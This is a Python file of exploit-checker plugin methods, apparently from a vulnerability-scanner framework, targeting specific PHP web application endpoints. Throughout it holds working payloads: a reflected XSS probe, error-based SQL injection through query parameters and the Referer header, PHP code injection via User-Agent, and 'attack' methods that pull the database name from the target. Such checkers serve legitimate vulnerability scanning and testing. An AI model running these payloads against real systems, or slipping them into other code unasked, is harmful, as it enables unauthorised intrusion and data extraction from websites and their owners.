def _verify(self):
    """Verify mode: check whether jobs-list.php reflects its ``key`` parameter unencoded.

    A random 8-letter marker is embedded in an attribute-breaking value; if the
    response body echoes that value back verbatim (same quotes, same attribute
    context) the reflection is reported as a finding.  The application-side fix
    is contextual output encoding of ``key``.

    Side effect: ``self.url`` is rewritten to the jobs-list.php endpoint.
    Returns ``self.parse_output(result)``; ``result`` is empty when nothing was
    reflected.
    """
    result = {}
    session = req.Session()
    session.get(self.url)
    self.url = self.url.strip('/') + "/jobs/jobs-list.php"
    endpoint = self.url
    marker = "".join(random.choice(string.ascii_letters) for _ in xrange(8)).lower()
    probe = "/jobs/jobs-list.php?key=%22%20autofocus%20onfocus=alert%28{}%29%20style=%22%22".format(marker)
    resp = session.get(endpoint + probe)
    time.sleep(2)
    # The decoded form of the probe is what a vulnerable page would print back.
    echoed = '" autofocus onfocus=alert({}) style='.format(marker)
    if echoed in resp.content:
        result['VerifyInfo'] = {'URL': endpoint}
    return self.parse_output(result)
def _attack(self):
    """Attack mode: walk ``self.url_list`` and read back the database name.

    Each candidate path gets an error-based payload appended; a ``~...~`` match
    in the response body is taken as the value of ``DB_NAME()`` and recorded
    under ``result['Database']['DBname']``.  The first path that yields a match
    wins and the loop stops.  Returns ``self.parse_output(result)``.
    """
    result = {}
    session = req.Session()
    session.get(self.url)
    base = self.url.strip('/')
    probe = "+and+1=%28SELECT%20%20char%28126%29%2bDB_NAME()%2bchar%28126%29%29--+"
    for path in self.url_list:
        target = base + path
        resp = session.get(target + probe)
        match = re.search('~(.*?)~', resp.content)
        if match is None:
            continue
        result['VerifyInfo'] = {'URL': target}
        result['Database'] = {'DBname': match.group(1)}
        break
    return self.parse_output(result)
def _verify(self):
    """Verify mode: error-based SQL injection probe against info.php.

    A random marker is placed inside an ``updatexml()`` expression appended to
    the ``tblprefix`` query; the marker turning up in ``resp.text`` means the
    injected SQL was evaluated by the database.  Side effect: ``self.url`` is
    rewritten to the probed endpoint (note: no slash normalisation here, unlike
    the sibling checks).  Returns ``self.parse_output(result)``.
    """
    result = {}
    session = req.Session()
    session.get(self.url)
    self.url += '/info.php?fid=1&tblprefix=cms_msession'
    marker = "".join(random.choice(string.ascii_letters) for _ in xrange(0, 8)).lower()
    prefix = '/**/where/**/1/**/and/**/updatexml(1,concat(0x37,(select/**/'
    suffix = '/**/limit/**/0,1)),1)%23'
    resp = session.get(self.url + prefix + marker + suffix)
    found = re.search(marker, resp.text)
    time.sleep(2)
    if found:
        result['VerifyInfo'] = {'URL': self.url}
    return self.parse_output(result)
def _verify(self):
    """Verify mode: SQL injection probe delivered through the ``referer`` header.

    c.php is requested with a crafted ``referer`` value carrying a random
    marker inside a duplicate-key error expression; the marker appearing in the
    response body is taken as evidence that the header reached a SQL query
    unescaped (request headers are attacker-controlled input and need the same
    parameterisation as query parameters).  Side effect: ``self.url`` is
    rewritten to the c.php endpoint.  Returns ``self.parse_output(result)``.
    """
    result = {}
    session = req.Session()
    session.get(self.url)
    self.url = self.url.strip('/') + "/c.php?id=1"
    marker = "".join(random.choice(string.ascii_letters) for _ in xrange(0, 8)).lower()
    injected = (
        "1',(SELECT 1 FROM (select count(*), concat(floor(rand(0)*2),"
        "(SELECT {}))a from information_schema.tables group by a)b),'"
    ).format(marker)
    resp = session.get(self.url, headers={'referer': injected})
    time.sleep(2)
    if marker in resp.content:
        result['VerifyInfo'] = {'URL': self.url}
    return self.parse_output(result)
def _verify(self, verify=True):
    """Verify mode: check whether PHP carried in the User-Agent header gets executed.

    ``self.gen_payload`` wraps a one-line ``echo`` of a fixed marker; the
    payload is sent once via User-Agent, then the page is fetched again and
    the marker is looked for in the body.  A non-200 on the first request
    short-circuits with an empty result.  ``verify`` is accepted for interface
    compatibility but not used here.  Returns ``self.parse_attack(result)``.
    """
    result = {}
    target = self.url
    marker = 'asdfgh123456'
    php_code = '''echo "asdfgh123456";'''
    crafted = self.gen_payload(php_code)
    session = req.Session()
    first = session.get(target, headers={"User-Agent": crafted})
    if first.status_code != 200:
        return self.parse_attack(result)
    second = session.get(target)
    if second.status_code == 200 and marker in second.content:
        result['VerifyInfo'] = {'URL': self.url, 'Payload': crafted}
    return self.parse_attack(result)
def _attack(self):
    """Attack mode: read the database name back through the ``referer`` header on c.php.

    The selected expression is ``database()`` wrapped in ``~``; a ``~...~``
    match in the response body is recorded as ``result['Database']['DBname']``.
    Side effect: ``self.url`` is rewritten to the c.php endpoint.  Returns
    ``self.parse_output(result)``.
    """
    result = {}
    session = req.Session()
    session.get(self.url)
    self.url = self.url.strip('/') + "/c.php?id=1"
    injected = (
        "1',(SELECT 1 FROM (select count(*), concat(floor(rand(0)*2),"
        "(SELECT concat(0x7e,database(),0x7e)))a from information_schema.tables group by a)b),'"
    )
    resp = session.get(self.url, headers={'referer': injected})
    time.sleep(2)
    match = re.search('~(.*?)~', resp.content)
    if match:
        result['VerifyInfo'] = {'URL': self.url}
        result['Database'] = {'DBname': match.group(1)}
    return self.parse_output(result)
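def send_command(url):
    """GET *url* with a fixed browser-like header set and return the response.

    Returns the ``req`` response object, or ``None`` if creating the session or
    performing the request raised -- callers must check for ``None`` before
    touching the result.  The ``Host`` and ``Referer`` headers are hard-coded to
    httpbin.org regardless of *url*; confirm that is intended before reusing
    this helper for other targets.

    Change from the original: the bare ``except:`` is narrowed to
    ``except Exception`` so ``KeyboardInterrupt``/``SystemExit`` are no longer
    swallowed into a silent ``None``.
    """
    headers = {
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
        "Connection": "close",
        "Cookie": "_gauges_unique_month=1; _gauges_unique_year=1; _gauges_unique=1; _gauges_unique_hour=1; _gauges_unique_day=1",
        "Host": "httpbin.org",
        "Referer": "http://httpbin.org/",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36",
    }
    try:
        resp = req.Session().get(url, headers=headers)
    except Exception:  # best-effort helper: any request failure maps to None
        resp = None
    return resp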
def _verify(self):
    """Verify mode: error-based SQL injection probe against search.php.

    A random marker is placed inside a duplicate-key error expression appended
    to the search query string; finding the marker in ``resp.text`` means the
    injected SQL was evaluated.  Side effect: ``self.url`` is rewritten to the
    search.php endpoint.  Returns ``self.parse_output(result)``.
    """
    result = {}
    session = req.Session()
    session.get(self.url)
    self.url = self.url.strip('/') + '/search.php?chid=1&carsfullname=aa&searchmode=subject&orderby=aid'
    prefix = '%20and%20(select%201%20from%20(select%20count(*),concat('
    suffix = ',floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&addno=0&ccid8=366'
    marker = "".join(random.choice(string.ascii_letters) for _ in xrange(0, 8)).lower()
    resp = session.get(self.url + prefix + marker + suffix)
    hit = re.search(marker, resp.text)
    time.sleep(2)
    if hit:
        result['VerifyInfo'] = {'URL': self.url}
    return self.parse_output(result)